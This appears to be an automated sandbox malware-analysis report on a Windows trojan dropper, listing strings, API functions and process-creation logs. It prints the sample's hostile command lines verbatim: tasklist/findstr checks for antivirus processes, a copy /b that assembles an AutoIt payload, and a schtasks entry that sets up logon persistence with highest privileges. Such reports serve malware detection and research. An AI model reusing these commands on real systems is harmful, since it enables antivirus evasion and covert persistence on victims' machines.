            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2017160041.000000000283A000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000000.2068027405.0000000000A99000.00000002.00000001.01000000.00000005.sdmp, ApolloSphere.pif, 00000010.00000002.3254047841.0000000000249000.00000002.00000001.01000000.00000008.sdmp, ApolloSphere.pif.11.dr, Flash.pif.2.dr, Parents.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: Flash.pif, 0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3256254115.0000000001350000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3249041675.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3249083801.000000000139B000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3256579902.00000000014CB000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3248898877.0000000001351000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3248832355.00000000042DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: https://sectigo.com/CPS0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Flash.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A44830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00A44830
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001F4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_001F4830
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00A44632
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00A5D164
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0020D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_0020D164

            System Summary

            barindex
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js"
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A342D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00A342D5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00A28F2E
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00A35778
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_001E5778
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_0040497C0_2_0040497C
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00406ED20_2_00406ED2
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004074BB0_2_004074BB
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009DB02011_2_009DB020
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009D94E011_2_009D94E0
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009D9C8011_2_009D9C80
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F23F511_2_009F23F5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A5840011_2_00A58400
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A0650211_2_00A06502
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009DE6F011_2_009DE6F0
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A0265E11_2_00A0265E
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F282A11_2_009F282A
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A089BF11_2_00A089BF
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A50A3A11_2_00A50A3A
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A06A7411_2_00A06A74
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009E0BE011_2_009E0BE0
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A2EDB211_2_00A2EDB2
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009FCD5111_2_009FCD51
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A50EB711_2_00A50EB7
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A38E4411_2_00A38E44
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A06FE611_2_00A06FE6
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F33B711_2_009F33B7
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009FF40911_2_009FF409
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009ED45D11_2_009ED45D
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F16B411_2_009F16B4
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009DF6A011_2_009DF6A0
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009EF62811_2_009EF628
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009D166311_2_009D1663
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F78C311_2_009F78C3
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F1BA811_2_009F1BA8
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009FDBA511_2_009FDBA5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A09CE511_2_00A09CE5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009EDD2811_2_009EDD28
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009FBFD611_2_009FBFD6
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_009F1FC011_2_009F1FC0
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0018B02016_2_0018B020
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001894E016_2_001894E0
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_00189C8016_2_00189C80
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A23F516_2_001A23F5
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0020840016_2_00208400
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001B650216_2_001B6502
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001B265E16_2_001B265E
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0018E6F016_2_0018E6F0
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A282A16_2_001A282A
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001B89BF16_2_001B89BF
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_00200A3A16_2_00200A3A
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001B6A7416_2_001B6A74
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_00190BE016_2_00190BE0
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ACD5116_2_001ACD51
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001DEDB216_2_001DEDB2
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E8E4416_2_001E8E44
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_00200EB716_2_00200EB7
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001B6FE616_2_001B6FE6
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A33B716_2_001A33B7
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001AF40916_2_001AF409
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0019D45D16_2_0019D45D
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0019F62816_2_0019F628
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0018166316_2_00181663
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A16B416_2_001A16B4
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0018F6A016_2_0018F6A0
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A78C316_2_001A78C3
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A1BA816_2_001A1BA8
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ADBA516_2_001ADBA5
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001B9CE516_2_001B9CE5
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_0019DD2816_2_0019DD28
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ABFD616_2_001ABFD6
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001A1FC016_2_001A1FC0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\723582\Flash.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: String function: 009F8B30 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: String function: 009E1A36 appears 34 times
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: String function: 009F0D17 appears 70 times
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: String function: 004062A3 appears 58 times
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: String function: 00191A36 appears 34 times
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: String function: 001A8B30 appears 42 times
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: String function: 001A0D17 appears 70 times
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStatic PE information: invalid certificate
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2017160041.000000000283A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@30/37@2/0
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3A6AD GetLastError,FormatMessageW,11_2_00A3A6AD
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A28DE9 AdjustTokenPrivileges,CloseHandle,11_2_00A28DE9
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00A29399
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001D8DE9 AdjustTokenPrivileges,CloseHandle,16_2_001D8DE9
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001D9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_001D9399
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00A34148
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00A3443D
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifFile created: C:\Users\user\AppData\Local\EduTech DynamicsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeFile created: C:\Users\user\AppData\Local\Temp\nslC0B5.tmpJump to behavior
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeReversingLabs: Detection: 66%
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeFile read: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 723582
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "wagemissileaffiliatesgreeting" Fisting
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Restriction + Manager + Screw + Anchor 723582\r
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\723582\Flash.pif 723582\Flash.pif 723582\r
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif" "C:\Users\user\AppData\Local\EduTech Dynamics\L"
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess created: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 723582Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "wagemissileaffiliatesgreeting" Fisting Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Restriction + Manager + Screw + Anchor 723582\rJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\723582\Flash.pif 723582\Flash.pif 723582\rJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 15Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifProcess created: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe C:\Users\user\AppData\Local\Temp\723582\RegAsm.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif" "C:\Users\user\AppData\Local\EduTech Dynamics\L"Jump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeSection loaded: wldp.dllJump to behavior
